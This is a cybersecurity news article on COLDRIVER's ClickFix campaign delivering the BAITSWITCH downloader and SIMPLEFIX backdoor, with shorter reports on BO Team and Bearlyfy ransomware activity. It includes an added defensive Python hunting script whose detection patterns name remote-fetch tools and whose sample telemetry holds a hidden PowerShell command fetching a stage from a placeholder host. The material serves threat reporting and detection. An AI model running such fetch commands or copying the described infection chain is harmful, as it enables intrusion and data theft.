Russian Hackers COLDRIVER Unleash New Malware in Targeted Attacks
The notorious Russian hacking group COLDRIVER is back with a new campaign, deploying a pair of freshly discovered, streamlined malware variants dubbed BAITSWITCH and SIMPLEFIX. The attacks, characterized by a "ClickFix" delivery method, place COLDRIVER alongside groups like BO Team and Bearlyfy in a surge of Russia-focused cyber activity.

A Russian hacking group, known as COLDRIVER, is making headlines again. Security researchers have linked them to a new wave of "ClickFix" attacks. These attacks are designed to deliver two new pieces of malware, which researchers are calling BAITSWITCH and SIMPLEFIX.
Zscaler ThreatLabz, the team that uncovered this latest campaign, describes BAITSWITCH as a downloader. Its main job? To install SIMPLEFIX, a sneaky PowerShell backdoor, onto compromised systems.
Who is COLDRIVER?
COLDRIVER, also known by names like Callisto, Star Blizzard, and UNC4057, is a hacking group with ties to Russia. They've been targeting a wide variety of sectors since 2019. Initially, they used spear-phishing to trick people into handing over their credentials. But now, they're getting more sophisticated, developing custom tools like SPICA and LOSTKEYS.
Back in May 2025, Google's Threat Intelligence Group (GTIG) already highlighted COLDRIVER's use of ClickFix tactics. They were using fake websites with CAPTCHA prompts to trick users into running PowerShell commands that installed the LOSTKEYS Visual Basic Script.
"The fact that they keep using ClickFix suggests it's still working, even if it's not exactly cutting-edge," said Zscaler researchers Sudeep Singh and Yin Hong Chang.
How the Latest Attack Works
This new attack follows a similar pattern. Users are tricked into running a malicious file (a DLL) through the Windows Run dialog, thinking they're just completing a CAPTCHA. This DLL, BAITSWITCH, then grabs the SIMPLEFIX backdoor from a server controlled by the attackers (captchanom[.]top). To make things look innocent, a fake document hosted on Google Drive is shown to the victim.
BAITSWITCH also sends system information to the attacker's server, receives commands to maintain its presence on the system, stores encrypted data in the Windows Registry, and downloads a PowerShell tool. It even tries to cover its tracks by deleting the last command run in the Run dialog.
The PowerShell tool then downloads SIMPLEFIX from another server (southprovesolutions[.]com). SIMPLEFIX then connects to a command-and-control (C2) server, allowing the attackers to run PowerShell scripts, commands, and other malicious programs.
One of the PowerShell scripts that SIMPLEFIX executes steals information about specific file types from a list of directories. This list is similar to the one used by the LOSTKEYS malware.
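The chain above leaves a recognisable shape in endpoint telemetry: a command pasted into the Run dialog is a child of explorer.exe, it invokes a loader or interpreter (rundll32, PowerShell), the command line reaches out to a remote host, and the Run history is cleaned up afterwards. The following is an added example, not code from the article or from Zscaler ThreatLabz. It scores constructed Sysmon-style process-creation records against that pattern and checks a snapshot of the RunMRU key for removed entries. Field names, paths, host names and the RunMRU-gap heuristic are assumptions made for illustration.

```python
"""Hunting for ClickFix-style execution chains in endpoint telemetry.

Added example (not from the article or from Zscaler): scores constructed
process-creation records and a constructed RunMRU snapshot.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the new process (Sysmon Event ID 1 "Image")
    command_line: str   # "CommandLine"
    parent_image: str   # "ParentImage"


# The Run dialog is hosted by explorer.exe, so commands typed there are its children.
RUN_DIALOG_PARENT = "explorer.exe"
# Loaders and interpreters commonly invoked by ClickFix lures.
SUSPECT_IMAGES = {"rundll32.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "regsvr32.exe"}
# Cues that the command fetches a second stage from a remote host.
REMOTE_FETCH = re.compile(
    r"https?://|\\\\[\w.-]+\\|\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|bitsadmin",
    re.IGNORECASE,
)
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE)
# rundll32 loading a DLL from a user-writable location rather than a system directory.
USER_WRITABLE_DLL = re.compile(r"(appdata|temp|downloads|public)[\\/][^\s,]*\.dll", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return a score and the reasons behind it; 0 means nothing ClickFix-like was seen."""
    reasons: list[str] = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    if parent == RUN_DIALOG_PARENT and image in SUSPECT_IMAGES:
        reasons.append(f"{image} spawned from the Run dialog (parent explorer.exe)")
    if REMOTE_FETCH.search(ev.command_line):
        reasons.append("command line fetches content from a remote host")
    if image in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAG.search(ev.command_line):
        reasons.append("PowerShell launched with an encoded command")
    if image == "rundll32.exe" and USER_WRITABLE_DLL.search(ev.command_line):
        reasons.append("rundll32 loads a DLL from a user-writable directory")
    return len(reasons), reasons


def triage(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, int, list[str]]]:
    """Return every event that combines at least two of the indicators above."""
    hits = []
    for ev in events:
        score, why = score_event(ev)
        if score >= 2:
            hits.append((ev, score, why))
    return hits


# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU stores Run dialog
# history as values a, b, c, ... plus an MRUList string giving their order.
# Heuristic (assumption): a slot that MRUList still orders but that no longer
# exists suggests a history entry was deleted after use.
def runmru_gaps(runmru: dict[str, str]) -> list[str]:
    order = runmru.get("MRUList", "")
    return [slot for slot in order if slot not in runmru]


# Constructed sample telemetry; hosts and paths are not real indicators.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\alice\AppData\Local\Temp\verify.dll,Start",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iwr http://example.invalid/stage -UseBasicParsing"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
                 r"C:\Windows\System32\svchost.exe"),
]

SAMPLE_RUNMRU = {"MRUList": "cba", "b": "cmd\\1", "c": "notepad\\1"}  # slot "a" missing


if __name__ == "__main__":
    for ev, score, why in triage(SAMPLE_EVENTS):
        print(f"[score {score}] {ev.command_line}")
        for reason in why:
            print(f"    - {reason}")
    print("RunMRU slots ordered but absent:", runmru_gaps(SAMPLE_RUNMRU))
```

On the constructed sample, the rundll32 and PowerShell launches from explorer.exe each collect two indicators and are surfaced, while the benign notepad launch and the system rundll32 invocation score zero; the RunMRU snapshot reports slot "a" as ordered but missing. The scoring is deliberately simple so it can be tuned against a fleet's own baseline rather than treated as a verdict.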
According to Zscaler, "COLDRIVER typically goes after NGOs, human rights advocates, think tanks in Western countries, and Russians living in exile. This new campaign seems to fit that pattern, targeting civil society members with connections to Russia."
Other Groups Targeting Russia
It's not just COLDRIVER. Kaspersky recently reported that the BO Team (aka Black Owl, Hoody Hyena, and Lifting Zmiy) launched a phishing campaign against Russian companies in early September. They used password-protected RAR archives to deliver a new version of BrockenDoor and an updated ZeronetKit.
ZeronetKit is a Golang backdoor with the ability to remotely access compromised systems, upload/download files, run commands using cmd.exe, and create TCP/IPv4 tunnels. Newer versions can even download and run shellcode and update the C2 server list.
Kaspersky explained that "ZeronetKit can't persist on its own, so attackers use BrockenDoor to copy the backdoor to startup."
Then there's Bearlyfy, a new group that's been using ransomware like LockBit 3.0 and Babuk to attack Russian organizations. They started with smaller companies and smaller ransoms, but by April 2025, they were going after bigger targets, according to F6. By August 2025, they had claimed at least 30 victims.
In one case, they exploited a vulnerability in Bitrix to gain initial access to a consulting company, then used the Zerologon flaw to escalate privileges. In another incident in July, initial access was gained through a partner company.
F6 researchers noted that "In the most recent attack, the ransom demand was €80,000 in cryptocurrency. But in the first attack, the ransom was only a few thousand dollars. Because the ransoms are relatively low, about one in five victims actually pay for the decryptors."
Bearlyfy is believed to have been active since January 2025. Analysis of their tools suggests possible links to a pro-Ukrainian group called PhantomCore, which has been targeting Russian and Belarusian companies since 2022. However, Bearlyfy is considered to be a separate group.
According to F6, "PhantomCore uses complex, multi-stage attacks typical of APTs. Bearlyfy, on the other hand, uses a different approach: quick attacks focused on immediate impact. They exploit external services and vulnerable applications to gain initial access, and their main goal is to encrypt, destroy, or modify data."